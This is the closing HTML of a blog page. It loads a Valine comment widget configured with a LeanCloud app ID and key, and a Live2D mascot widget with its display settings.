<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            visitor: true,
            appId: 'Ku71Pva4EFeKIH5y64LCYVwp-gzGzoHsz',
            appKey: 'wqnsWKV8eVHemIwCa9vo9vRg',
            placeholder: '快来评论一下吧',
            avatar: 'robohash'
        })
    </script>

    
<!-- utterances Comments -->



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"superSample":2,"width":200,"height":350,"position":"right","hOffset":0,"vOffset":-20},"mobile":{"show":false,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
